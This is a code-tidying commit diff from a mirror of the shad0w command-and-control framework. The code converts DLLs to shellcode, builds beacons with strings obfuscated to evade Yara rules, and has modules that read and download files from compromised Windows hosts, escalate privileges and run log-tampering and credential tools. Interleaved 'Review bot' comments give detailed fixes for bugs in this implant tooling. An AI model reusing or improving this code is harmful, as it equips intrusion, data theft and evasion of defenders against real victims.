mirror of https://github.com/bats3c/shad0w
tidy code up
parent
afede223b5
commit
4890df575c
|
@ -7,8 +7,9 @@ if sys.version_info < (3,0):
|
|||
import struct
|
||||
from struct import pack
|
||||
|
||||
MACHINE_IA64=512
|
||||
MACHINE_AMD64=34404
|
||||
MACHINE_IA64 = 512
|
||||
MACHINE_AMD64 = 34404
|
||||
|
||||
|
||||
def is64BitDLL(bytes):
|
||||
header_offset = struct.unpack("<L", bytes[60:64])[0]
|
||||
|
@ -16,16 +17,18 @@ def is64BitDLL(bytes):
|
|||
if machine == MACHINE_IA64 or machine == MACHINE_AMD64:
|
||||
return True
|
||||
return False
|
||||
|
||||
|
||||
|
||||
ror = lambda val, r_bits, max_bits: \
|
||||
((val & (2**max_bits-1)) >> r_bits%max_bits) | \
|
||||
(val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
|
||||
|
||||
def HashFunctionName(name, module = None):
|
||||
|
||||
def HashFunctionName(name, module=None):
|
||||
|
||||
function = name.encode() + b'\x00'
|
||||
|
||||
if(module):
|
||||
if module:
|
||||
module = module.upper().encode('UTF-16LE') + b'\x00\x00'
|
||||
|
||||
functionHash = 0
|
||||
|
@ -53,6 +56,7 @@ def HashFunctionName(name, module = None):
|
|||
|
||||
return functionHash
|
||||
|
||||
|
||||
def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
|
||||
|
||||
#MARKER:S
|
||||
|
@ -139,7 +143,8 @@ def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
|
|||
# User data
|
||||
return bootstrap + rdiShellcode + dllBytes + userData
|
||||
|
||||
else: # 32 bit
|
||||
else:
|
||||
# 32 bit
|
||||
rdiShellcode = rdiShellcode32
|
||||
|
||||
bootstrap = b''
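Review bot: `is64BitDLL(bytes)` still names its parameter after the builtin `bytes`, and `ror` is still a lambda bound to a name (pycodestyle E731), both of which a tidy-up pass would normally pick up along with the spacing. Renaming the parameter, for example `def is64BitDLL(dll_bytes):`, and writing `def ror(val, r_bits, max_bits):` with the same expression as its return value keeps positional callers unchanged. Whether any caller passes `bytes=` by keyword cannot be seen from these hunks, and both definitions extend beyond the lines shown.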
|
||||
|
|
|
@ -1,17 +1,20 @@
|
|||
import string
|
||||
import random
|
||||
|
||||
|
||||
def gen_rand_filename():
|
||||
name = ""
|
||||
for i in range(1, 10):
|
||||
name += random.choice(list(string.ascii_uppercase + string.ascii_lowercase))
|
||||
return name
|
||||
|
||||
|
||||
def get_size(filename):
|
||||
with open(filename, "rb") as file:
|
||||
length = len(file.read())
|
||||
return length
|
||||
|
||||
|
||||
def clean_hex_output(hex_bytes):
|
||||
raw_crypt_bytes = b""
|
||||
for byte in hex_bytes.split():
|
||||
|
@ -25,17 +28,20 @@ def clean_hex_output(hex_bytes):
|
|||
raw_crypt_bytes += bytes.fromhex(byte)
|
||||
return raw_crypt_bytes
|
||||
|
||||
|
||||
def prepare_pe_image(bytes_len, data):
|
||||
pe_image = f"#define array_len {bytes_len}\n\n"
|
||||
pe_image = f"#define array_len {bytes_len}\n\n"
|
||||
pe_image += "unsigned long long image_crypt[] = {\n"
|
||||
pe_image += data
|
||||
pe_image += "\n};"
|
||||
return pe_image
|
||||
|
||||
|
||||
def write_pe_image(path, pe_image):
|
||||
with open(path, "w") as file:
|
||||
file.write(pe_image)
|
||||
|
||||
|
||||
def write_header_file(path, keys_used, jmp=False, runpe=False):
|
||||
headerfile = ""
|
||||
with open(path, "w") as file:
|
||||
|
@ -48,6 +54,7 @@ def write_header_file(path, keys_used, jmp=False, runpe=False):
|
|||
headerfile += "void RunFromMemory(char* pImage, char* pPath);\n"
|
||||
file.write(headerfile)
|
||||
|
||||
|
||||
def write_decrypt(path, loops, enc_type="xor"):
|
||||
first_run = False
|
||||
to_write = ""
|
||||
|
@ -88,6 +95,7 @@ def write_decrypt(path, loops, enc_type="xor"):
|
|||
|
||||
return safe
|
||||
|
||||
|
||||
def clean_up(path, clean):
|
||||
with open(path, "w") as file:
|
||||
file.write(clean)
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import random
|
||||
|
||||
|
||||
class Banner(object):
|
||||
def __init__(self):
|
||||
super(Banner, self).__init__()
|
||||
|
@ -103,4 +104,4 @@ class Banner(object):
|
|||
'''` ";;;.
|
||||
"""
|
||||
|
||||
self.banners = [banner4, banner1, banner2, banner3]
|
||||
self.banners = [banner4, banner1, banner2, banner3]
|
||||
|
|
|
@ -19,6 +19,7 @@ static_warning = """Static payloads can be very large and much easier to detect.
|
|||
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
|
||||
"""
|
||||
|
||||
|
||||
def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/beacon", asm=False, backmake=False):
|
||||
# move the source files of the beacon over to the build directory
|
||||
|
||||
|
@ -36,6 +37,7 @@ def clone_source_files(rootdir="src", builddir="build", basedir="/root/shad0w/be
|
|||
|
||||
return
|
||||
|
||||
|
||||
def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
|
||||
# update the settings so that when we build, we will use our new args
|
||||
|
||||
|
@ -63,6 +65,7 @@ def update_settings_file(shad0wbuild, custom_template=None, custom_path=None):
|
|||
|
||||
return
|
||||
|
||||
|
||||
def _crypt_string(raw_string, key):
|
||||
# xor encrypt a string with a provided key
|
||||
crypt_string = ""
|
||||
|
@ -71,10 +74,12 @@ def _crypt_string(raw_string, key):
|
|||
|
||||
return base64.b64encode(crypt_string.encode())
|
||||
|
||||
|
||||
def _gen_key(name):
|
||||
key = hex(random.randint(0, 100))
|
||||
return f"#define {name}_KEY {key}", key
|
||||
|
||||
|
||||
def _crypt_strings():
|
||||
# encrypt strings so they are not hanging around in the binary waiting to be
|
||||
# thrown into a Yara rule. This is obfuscation not encryption
|
||||
|
@ -103,7 +108,6 @@ def _crypt_strings():
|
|||
return
|
||||
|
||||
|
||||
|
||||
def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=None, modlocation="/root/shad0w/beacon/beacon.exe", debug=False, make_target=None):
|
||||
# build the beacon from the source files, making sure to
|
||||
# obey the correct payload settings that we have been given
|
||||
|
@ -121,7 +125,8 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
|
|||
# remove the old file
|
||||
try:
|
||||
os.unlink(modlocation)
|
||||
except: pass
|
||||
except:
|
||||
pass
|
||||
|
||||
# make sure we in the correct build dir
|
||||
os.chdir(builddir)
|
||||
|
@ -161,6 +166,7 @@ def make_in_clone(arch=None, platform=None, secure=None, static=None, builddir=N
|
|||
|
||||
return True
|
||||
|
||||
|
||||
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
|
||||
# use Donut or srdi to extract the shellcode from our newly created beacon
|
||||
|
||||
|
@ -192,6 +198,7 @@ def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=
|
|||
|
||||
return code
|
||||
|
||||
|
||||
def write_and_bridge(filename, rcode, noremove=False):
|
||||
# write the supplied code to the file given
|
||||
# by the user and then make sure they can access it
|
||||
|
@ -210,6 +217,7 @@ def write_and_bridge(filename, rcode, noremove=False):
|
|||
|
||||
return len(rcode)
|
||||
|
||||
|
||||
def raise_issue_payload(string):
|
||||
|
||||
# throw an error with the payload string
|
||||
|
@ -218,6 +226,7 @@ def raise_issue_payload(string):
|
|||
# exit with error code
|
||||
exit(-1)
|
||||
|
||||
|
||||
def get_payload_variables(payload_string, warn=True):
|
||||
|
||||
global secure_warning, static_warning
|
||||
|
@ -271,6 +280,7 @@ def get_payload_variables(payload_string, warn=True):
|
|||
# return our generated args
|
||||
return arch, platform, secure, static
|
||||
|
||||
|
||||
def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, exploit=False):
|
||||
# make the build process quicker for modules
|
||||
|
||||
|
@ -304,6 +314,7 @@ def elevate_auto_build(rootdir=None, template=None, arch=None, check=False, expl
|
|||
# give the shellcode back
|
||||
return rcode
|
||||
|
||||
|
||||
def shellcode_to_array(data):
|
||||
length = 0
|
||||
line_len = 0
|
||||
|
@ -389,6 +400,7 @@ def elevate_build_stage(shad0w, rootdir=None, os=None, arch=None, secure=None, f
|
|||
with open(stagefile, "w+") as file:
|
||||
file.write(stage_template)
|
||||
|
||||
|
||||
def _random_string(length):
|
||||
rstring = ""
|
||||
alphabet = string.ascii_lowercase + string.ascii_uppercase
|
||||
|
@ -398,6 +410,7 @@ def _random_string(length):
|
|||
|
||||
return rstring
|
||||
|
||||
|
||||
def shrink_exe(name):
|
||||
os.system(f"strip {name} 1>/dev/null 2>&1")
|
||||
os.system(f"upx --brute {name} 1>/dev/null 2>&1")
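Review bot: `shrink_exe` interpolates `name` straight into a shell string for `os.system`, so a file name containing spaces or shell metacharacters is parsed by the shell instead of being passed as a single argument. An argument list avoids the shell entirely, e.g. `subprocess.run(["strip", name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)` and the same shape for `["upx", "--brute", name]`. That needs `subprocess` imported, which is not visible from this hunk. The exit status of both commands is also discarded, so a failed strip or pack goes unnoticed by the caller. The function may continue below the last line shown.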
|
||||
|
|
|
@ -5,6 +5,7 @@ from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, \
|
|||
from pygments.token import Punctuation, \
|
||||
Text, Comment, Operator, Keyword, Name, String, Number, Generic
|
||||
|
||||
|
||||
class Shad0wLexer(RegexLexer):
|
||||
name = 'shad0w'
|
||||
aliases = ['shad0w']
|
||||
|
|
|
@ -2,6 +2,7 @@ __description__ = "Go back to the initial shell"
|
|||
__author__ = "@HashtagMarkus"
|
||||
__type__ = "beacon"
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -8,6 +8,7 @@ __description__ = "Interact with or display current beacons"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "beacon"
|
||||
|
||||
|
||||
def _list_beacons(shad0w):
|
||||
# I have gcse english, I gonna use it
|
||||
if shad0w.beacon_count == 1:
|
||||
|
@ -22,15 +23,15 @@ def _list_beacons(shad0w):
|
|||
# stuff we will display
|
||||
|
||||
# beacon number
|
||||
num = shad0w.beacons[beacon]["num"]
|
||||
num = shad0w.beacons[beacon]["num"]
|
||||
|
||||
# get last check in time
|
||||
checkin = shad0w.beacons[beacon]["last_checkin"]
|
||||
checkin = shad0w.beacons[beacon]["last_checkin"]
|
||||
|
||||
# stuff to format for name
|
||||
domain = shad0w.beacons[beacon]["domain"]
|
||||
username = shad0w.beacons[beacon]["username"]
|
||||
machine = shad0w.beacons[beacon]["machine"]
|
||||
domain = shad0w.beacons[beacon]["domain"]
|
||||
username = shad0w.beacons[beacon]["username"]
|
||||
machine = shad0w.beacons[beacon]["machine"]
|
||||
|
||||
# format of name
|
||||
if domain != "NULL":
|
||||
|
@ -44,7 +45,6 @@ def _list_beacons(shad0w):
|
|||
|
||||
print(t)
|
||||
|
||||
return
|
||||
|
||||
def _interact_beacon(shad0w, args):
|
||||
# get beacon number
|
||||
|
@ -54,7 +54,7 @@ def _interact_beacon(shad0w, args):
|
|||
try:
|
||||
interact_with = int(interact_with)
|
||||
except ValueError:
|
||||
shad0w.debug.log(f"'{interact_with}' is an invaild beacon", log=True)
|
||||
shad0w.debug.log(f"'{interact_with}' is an invalid beacon", log=True)
|
||||
return
|
||||
|
||||
# match the beacon number to the id and then set the current id as that
|
||||
|
|
|
@ -41,13 +41,13 @@ def generate_beacon_code(shad0w, beacon):
|
|||
buildtools.update_settings_file(None, custom_template=settings_template)
|
||||
|
||||
if beacon is None:
|
||||
os = shad0w.beacons[shad0w.current_beacon]["os"]
|
||||
os_ = shad0w.beacons[shad0w.current_beacon]["os"]
|
||||
arch = shad0w.beacons[shad0w.current_beacon]["arch"]
|
||||
secure = shad0w.beacons[shad0w.current_beacon]["secure"]
|
||||
else:
|
||||
arch, arch, secure, _ = buildtools.get_payload_variables(beacon)
|
||||
|
||||
buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True)
|
||||
buildtools.make_in_clone(arch=arch, platform=os_, secure=secure, static=True)
|
||||
|
||||
return buildtools.extract_shellcode()
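Review bot: In the `else` branch the unpacking `arch, arch, secure, _ = buildtools.get_payload_variables(beacon)` binds `arch` twice and never binds `os_`, so the following `make_in_clone(arch=arch, platform=os_, ...)` raises `UnboundLocalError` whenever `beacon` is not None. The rename from `os` to `os_` was applied to the `if` branch and the call, but not to this line. `get_payload_variables` returns `arch, platform, secure, static` in the build-tools section of this commit, so the line should read `arch, os_, secure, _ = buildtools.get_payload_variables(beacon)`. `generate_beacon_code` starts above this hunk.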
|
||||
|
||||
|
|
|
@ -11,7 +11,7 @@ __description__ = "Show the contents of a file on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_LS = 0x2000
|
||||
|
||||
ERROR = False
|
||||
|
@ -23,22 +23,24 @@ def error(message):
|
|||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def cat_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
if shad0w.current_beacon is None:
|
||||
shad0w.debug.error("ERROR: No active beacon.")
|
||||
return
|
||||
|
||||
|
||||
# usage examples
|
||||
usage_examples = """
|
||||
Don't try to cat binary files, it doesnt work very well.
|
||||
|
@ -82,4 +84,4 @@ cat C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = cat_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
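Review bot: `exit` in this file keeps the one-line `if message != None: print(message)` followed by a redundant `return`, while the same helper is rewritten to `if message is not None:` / `print(message)` in the cd, download, elevate, Metasploit, migrate and mkdir sections of this commit. The unconverted form also appears to remain in the sections whose hunks are headed `DIE_ID = 0x6000`, `RUBEUS_BIN = ...`, `OPCODE_LS = 0x1000` and `MIMIKATZ_BIN = ...`, and in the final section. Applying the same two lines there keeps the tidy-up uniform. Because `error` and `exit` are copied into each module, a single shared helper would prevent this drift, and the name `exit` shadows the builtin wherever it is defined.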
|
||||
|
|
|
@ -9,21 +9,23 @@ __description__ = "Change the working directory on a target"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "file system"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_CD = 0x6000
|
||||
|
||||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def get_list_directory(rargs, args):
|
||||
# resolve the directory we need to list
|
||||
|
@ -46,6 +48,7 @@ def cd_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# save the raw args
|
||||
|
@ -64,11 +67,11 @@ Examples:
|
|||
cd C:\\
|
||||
cd "C:\\Documents and Settings"
|
||||
"""
|
||||
|
||||
|
||||
parse = argparse.ArgumentParser(prog='ls',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
parse.error = error
|
||||
|
@ -97,4 +100,4 @@ cd "C:\\Documents and Settings"
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = cd_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
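Review bot: The parser in this module is still created with `prog='ls'` although the usage examples and the module description are for `cd`, so help and error text will name the wrong command. It looks copied from the directory-listing module. The fix is one word, `parse = argparse.ArgumentParser(prog='cd',`. `main` begins above this hunk.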
|
||||
|
|
|
@ -15,16 +15,18 @@ DIE_ID = 0x6000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -10,6 +10,7 @@ __type__ = "enumeration"
|
|||
|
||||
EXEC_ID = 0x3000
|
||||
|
||||
|
||||
def format_data(shad0w, data):
|
||||
data = data.splitlines()
|
||||
|
||||
|
@ -25,6 +26,7 @@ def format_data(shad0w, data):
|
|||
if "v" in line:
|
||||
shad0w.debug.log(f"-\t{line}", log=True, pre=False)
|
||||
|
||||
|
||||
def dotnet_callback(shad0w, data):
|
||||
# well its kind of true
|
||||
if "v" not in data:
|
||||
|
@ -60,4 +62,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = dotnet_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
|
|
|
@ -21,15 +21,17 @@ error_list = ""
|
|||
# name of the file to download
|
||||
FILE_TO_DOWNLOAD = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def download_callback(shad0w, data):
|
||||
global FILE_TO_DOWNLOAD
|
||||
|
@ -74,8 +76,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
|
||||
# init the parser
|
||||
parse = argparse.ArgumentParser(prog='download',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
|
@ -89,10 +91,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
args = parse.parse_args(args[1:])
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
# we need a file to read so if we don't then fail
|
||||
if len(args.file) == 0:
|
||||
print(error_list)
|
||||
print(error_list)
|
||||
parse.print_help()
|
||||
return
|
||||
|
||||
|
@ -101,10 +103,10 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
|
||||
# change to the dir of the folder mapped to the users current dir
|
||||
os.chdir("/root/shad0w/.bridge")
|
||||
|
||||
|
||||
# make this variable global so the call back can access it
|
||||
FILE_TO_DOWNLOAD = args.file
|
||||
|
||||
|
||||
# change back to our dir
|
||||
os.chdir(shad0w_cwd)
|
||||
|
||||
|
@ -112,7 +114,8 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
read_file = ' '.join(args.file).replace('\\', "\\\\").replace('"', '')
|
||||
|
||||
# clone all the source files
|
||||
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/", builddir="/root/shad0w/modules/windows/download/build")
|
||||
buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/download/",
|
||||
builddir="/root/shad0w/modules/windows/download/build")
|
||||
|
||||
# set the correct settings
|
||||
template = """#define _C2_CALLBACK_ADDRESS L"%s"
|
||||
|
@ -125,14 +128,17 @@ download C:\\Users\\thejoker\\Desktop\\evil_plans.txt
|
|||
#define DO_CALLBACK 0x4000
|
||||
#define FILENAME "%s" """ % (shad0w.endpoint, shad0w.addr[1], shad0w.current_beacon, read_file)
|
||||
|
||||
buildtools.update_settings_file(None, custom_template=template, custom_path="/root/shad0w/modules/windows/download/build/settings.h")
|
||||
buildtools.update_settings_file(None, custom_template=template,
|
||||
custom_path="/root/shad0w/modules/windows/download/build/settings.h")
|
||||
|
||||
# compile the module
|
||||
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build", modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
|
||||
buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/download/build",
|
||||
modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64")
|
||||
|
||||
# get the shellcode from the module
|
||||
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe", want_base64=True)
|
||||
rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/download/module.exe",
|
||||
want_base64=True)
|
||||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = download_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
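Review bot: The handler after `args = parse.parse_args(args[1:])` is still a bare `except:` with `pass`, so every failure, including `KeyboardInterrupt`, is swallowed and execution falls through to `len(args.file)` with `args` presumably still the raw argument list. Narrowing it to `except Exception:` and returning after `print(error_list)` and `parse.print_help()` makes the failure path explicit instead of surfacing later as an `AttributeError`. The `try:` line is outside the hunk, so the guarded statement is assumed to be the `parse_args` call shown, and `main` starts above it.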
|
||||
|
|
|
@ -18,15 +18,17 @@ ERROR = False
|
|||
error_list = ""
|
||||
RAN_COMMAND = False
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
if message is not None:
|
||||
print(message)
|
||||
|
||||
|
||||
def list_exploits(shad0w):
|
||||
sys.path.append("/root/shad0w/exploits/")
|
||||
|
@ -42,6 +44,7 @@ def list_exploits(shad0w):
|
|||
|
||||
print(t)
|
||||
|
||||
|
||||
def show_details(shad0w, name):
|
||||
sys.path.append("/root/shad0w/exploits/")
|
||||
all_exploits = importlib.import_module("__init__").__all__
|
||||
|
@ -56,8 +59,11 @@ def show_details(shad0w, name):
|
|||
arch = importlib.import_module(exploit.replace("/", ".")).__description__["Arch"]
|
||||
|
||||
secure = importlib.import_module(exploit.replace("/", ".")).__description__["Secure"]
|
||||
if secure: secure = "Yes"
|
||||
else: secure = "No"
|
||||
|
||||
if secure:
|
||||
secure = "Yes"
|
||||
else:
|
||||
secure = "No"
|
||||
|
||||
shad0w.debug.log("Exploit details:\n", log=True)
|
||||
shad0w.debug.log(f"Name: {exploit_name}", log=True, pre=False)
|
||||
|
@ -68,6 +74,7 @@ def show_details(shad0w, name):
|
|||
shad0w.debug.log(f"Arch: {arch}", log=True, pre=False)
|
||||
shad0w.debug.log(f"Supports Secure: {secure}", log=True, pre=False)
|
||||
|
||||
|
||||
def check_exploit(shad0w, name, arch):
|
||||
# run the exploit in check mode
|
||||
|
||||
|
@ -79,6 +86,7 @@ def check_exploit(shad0w, name, arch):
|
|||
if name == exploit_name:
|
||||
importlib.import_module(exploit.replace("/", ".")).check(shad0w, arch)
|
||||
|
||||
|
||||
def use_exploit(shad0w, name, arch):
|
||||
# run the exploit in exploit mode
|
||||
|
||||
|
@ -91,6 +99,7 @@ def use_exploit(shad0w, name, arch):
|
|||
exploit_mod = importlib.import_module(exploit.replace("/", "."))
|
||||
threading.Thread(target=exploit_mod.exploit, args=(shad0w, arch)).start()
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
global RAN_COMMAND
|
||||
|
||||
|
@ -113,8 +122,8 @@ elevate --smart
|
|||
|
||||
# init the parser
|
||||
parse = argparse.ArgumentParser(prog='elevate',
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog=usage_examples)
|
||||
|
||||
# keep it behaving nice
|
||||
parse.exit = exit
|
||||
|
@ -163,4 +172,3 @@ elevate --smart
|
|||
|
||||
if RAN_COMMAND == False:
|
||||
parse.print_help()
|
||||
return
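Review bot: `list_exploits` and `show_details` both call `sys.path.append("/root/shad0w/exploits/")` on every invocation, so `sys.path` accumulates duplicate entries over a session. Because the directory is appended last, `importlib.import_module("__init__")` resolves a top-level module named `__init__` by search order and would load an `__init__.py` from any earlier path entry first. A guard such as `if EXPLOITS_DIR not in sys.path: sys.path.append(EXPLOITS_DIR)` (the constant name is constructed here) removes the duplication, and loading the index from an explicit file location would remove the search-order dependence. The final hunk also keeps `if RAN_COMMAND == False:`, which reads better as `if not RAN_COMMAND:`. Both functions continue outside their hunks.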
|
|
@ -2,12 +2,13 @@
|
|||
# exit shad0w
|
||||
#
|
||||
|
||||
import os, signal
|
||||
import sys
|
||||
|
||||
__description__ = "Exit shad0w C2"
|
||||
__author__ = "@_batsec_"
|
||||
__type__ = "system"
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
# Once we have logging we will probably want to make a more sophisticated exit routine
|
||||
os.sys.exit(0)
|
||||
sys.exit(0)
|
||||
|
|
|
@ -8,14 +8,16 @@ __description__ = "Show current process info"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "process"
|
||||
|
||||
EXEC_ID = 0x4000
|
||||
EXEC_ID = 0x4000
|
||||
OPCODE_PID = 0x7000
|
||||
|
||||
|
||||
def pid_callback(shad0w, data):
|
||||
shad0w.debug.log(data, log=True, pre=False)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
@ -29,4 +31,4 @@ def main(shad0w, args):
|
|||
|
||||
# set a task for the current beacon to do
|
||||
shad0w.beacons[shad0w.current_beacon]["callback"] = pid_callback
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
|
||||
|
|
|
@ -25,17 +25,18 @@ RUBEUS_BIN = "/root/shad0w/bin/gitl.x64.exe"
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
|
||||
|
||||
def ghostinthelogs_callback(shad0w, data):
|
||||
data = data.replace("[+]", "\033[1;32m[+]\033[0m")
|
||||
data = data.replace("[!]", "\033[1;31m[!]\033[0m")
|
||||
|
@ -47,6 +48,7 @@ def ghostinthelogs_callback(shad0w, data):
|
|||
|
||||
return ""
|
||||
|
||||
|
||||
def set_and_send(shad0w, args):
|
||||
args.cls = False
|
||||
args.method = False
|
||||
|
@ -65,6 +67,7 @@ def set_and_send(shad0w, args):
|
|||
|
||||
return
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
raw_args = args
|
||||
|
|
|
@ -10,6 +10,7 @@ __description__ = "Show help information"
|
|||
__author__ = "@_batsec_"
|
||||
__type__ = "system"
|
||||
|
||||
|
||||
def usage(shad0w):
|
||||
t = PrettyTable(["Type", "Command", "Description"])
|
||||
|
||||
|
@ -28,7 +29,7 @@ def usage(shad0w):
|
|||
|
||||
try:
|
||||
description = mod.__description__
|
||||
except:
|
||||
except Exception:
|
||||
description = "No description available."
|
||||
|
||||
t.add_row([type, command, description])
|
||||
|
@ -37,6 +38,7 @@ def usage(shad0w):
|
|||
|
||||
return t
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
info = usage(shad0w)
|
||||
shad0w.debug.log(info, pre=False, log=True)
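Review bot: `except Exception:` around `description = mod.__description__` is still broader than the single failure it guards against, a module that lacks the attribute. `description = getattr(mod, "__description__", "No description available.")` expresses that without a try block and without hiding unrelated errors. The row is built from a name called `type`, presumably a local assigned above the hunk, which shadows the builtin inside `usage`.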
|
|
@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
|
|||
# location of lockless binary
|
||||
LOCKLESS_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/LockLess.exe"
|
||||
|
||||
# little hack but lets us pass the args to Donut
|
||||
|
||||
class DummyClass(object):
|
||||
# little hack but lets us pass the args to Donut
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
|
||||
def lockless_callback(shad0w, data):
|
||||
print(data)
|
||||
|
||||
return ""
|
||||
|
||||
|
||||
def main(shad0w, args):
|
||||
|
||||
# check we actually have a beacon
|
||||
|
|
|
@ -15,16 +15,18 @@ OPCODE_LS = 0x1000
|
|||
ERROR = False
|
||||
error_list = ""
|
||||
|
||||
# let argparse error and exit nice
|
||||
|
||||
def error(message):
|
||||
global ERROR, error_list
|
||||
ERROR = True
|
||||
error_list += f"\033[0;31m{message}\033[0m\n"
|
||||
|
||||
|
||||
def exit(status=0, message=None):
|
||||
if message != None: print(message)
|
||||
return
|
||||
